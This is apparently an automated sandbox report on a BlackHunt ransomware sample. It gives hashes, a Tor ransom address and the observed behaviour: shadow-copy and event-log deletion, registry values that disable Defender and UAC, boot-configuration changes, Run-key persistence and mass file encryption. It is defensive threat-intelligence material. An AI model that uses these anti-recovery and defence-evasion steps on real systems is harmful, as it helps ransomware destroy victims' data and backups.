Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:09
Static task
static1
Behavioral task
behavioral1
Sample
03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe
Resource
win10v2004-20231222-en
General
-
Target
03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe
-
Size
707KB
-
MD5
0491da25ec3f1dc8044cfc843e1aa909
-
SHA1
da6e30882d587fafd2e5d6f938b97c3b30a03413
-
SHA256
03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892
-
SHA512
a6ecf24122f8c1e7ad64a19a3071892ada3bab41bc1487750bff88ec6d7b8d6912d57fffb8b714da8fe8b64b44780244f249b84cac4cf169923b74561e0fd1e5
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8avnh:6uaTmkZJ+naie5OTamgEoKxLWg0h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4804 fsutil.exe 12632 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 9596 wevtutil.exe 8932 wevtutil.exe 12388 wevtutil.exe 6828 wevtutil.exe 12168 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5540 bcdedit.exe 6372 bcdedit.exe 12800 bcdedit.exe 12508 bcdedit.exe -
Renames multiple (3378) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7456 wbadmin.exe 4340 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\P: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\Z: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\B: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\K: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\O: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\H: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\R: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\U: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\Q: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\Y: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\V: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\J: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\L: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\N: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\I: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\S: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\X: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\M: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\T: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened (read-only) \??\A: 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-sl\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_unselected_18.svg 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-tool-view.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-sl\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightDemiBold.ttf 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\ui-strings.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\ui-strings.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\PlayStore_icon.svg 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\PlayStore_icon.svg 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-sl\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-down_32.svg 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#BlackHunt_ReadMe.hta 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\ui-strings.js 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\#BlackHunt_ReadMe.txt 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main.css 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_Private.key 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8648 13052 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1272 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5868 vssadmin.exe 7532 vssadmin.exe 13160 vssadmin.exe 852 vssadmin.exe 2404 vssadmin.exe 4972 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7596 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 12512 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeRestorePrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeBackupPrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeTakeOwnershipPrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeAuditPrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeSecurityPrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeIncBasePriorityPrivilege 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe Token: SeBackupPrivilege 5456 vssvc.exe Token: SeRestorePrivilege 5456 vssvc.exe Token: SeAuditPrivilege 5456 vssvc.exe Token: SeBackupPrivilege 7340 wbengine.exe Token: SeRestorePrivilege 7340 wbengine.exe Token: SeSecurityPrivilege 7340 wbengine.exe Token: SeSecurityPrivilege 9596 wevtutil.exe Token: SeBackupPrivilege 9596 wevtutil.exe Token: SeSecurityPrivilege 8932 wevtutil.exe Token: SeBackupPrivilege 8932 wevtutil.exe Token: SeSecurityPrivilege 6828 wevtutil.exe Token: SeBackupPrivilege 6828 wevtutil.exe Token: SeSecurityPrivilege 12388 wevtutil.exe Token: SeBackupPrivilege 12388 wevtutil.exe Token: SeSecurityPrivilege 12168 wevtutil.exe Token: SeBackupPrivilege 12168 wevtutil.exe Token: SeDebugPrivilege 7596 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2056 wrote to memory of 1348 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 176 PID 2056 wrote to memory of 1348 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 176 PID 2056 wrote to memory of 4704 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 95 PID 2056 wrote to memory of 4704 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 95 PID 2056 wrote to memory of 968 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 195 PID 2056 wrote to memory of 968 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 195 PID 2056 wrote to memory of 4016 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 98 PID 2056 wrote to memory of 4016 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 98 PID 2056 wrote to memory of 3904 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 181 PID 2056 wrote to memory of 3904 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 181 PID 2056 wrote to memory of 4696 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 103 PID 2056 wrote to memory of 4696 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 103 PID 1348 wrote to memory of 4876 1348 reg.exe 105 PID 1348 wrote to memory of 4876 1348 reg.exe 105 PID 2056 wrote to memory of 1800 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 106 PID 2056 wrote to memory of 1800 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 106 PID 2056 wrote to memory of 3464 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 110 PID 2056 wrote to memory of 3464 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 110 PID 4704 wrote to memory of 4036 4704 cmd.exe 107 PID 4704 wrote to memory of 4036 4704 cmd.exe 107 PID 2056 wrote to memory of 4780 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 111 PID 2056 wrote to memory of 4780 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 111 PID 968 wrote to memory of 388 968 cmd.exe 113 PID 968 wrote to memory of 388 968 cmd.exe 113 PID 2056 wrote to memory of 4408 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 115 PID 2056 wrote to memory of 4408 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 115 PID 2056 wrote to memory of 1460 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 114 PID 2056 wrote to memory of 1460 2056 03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe 114 PID 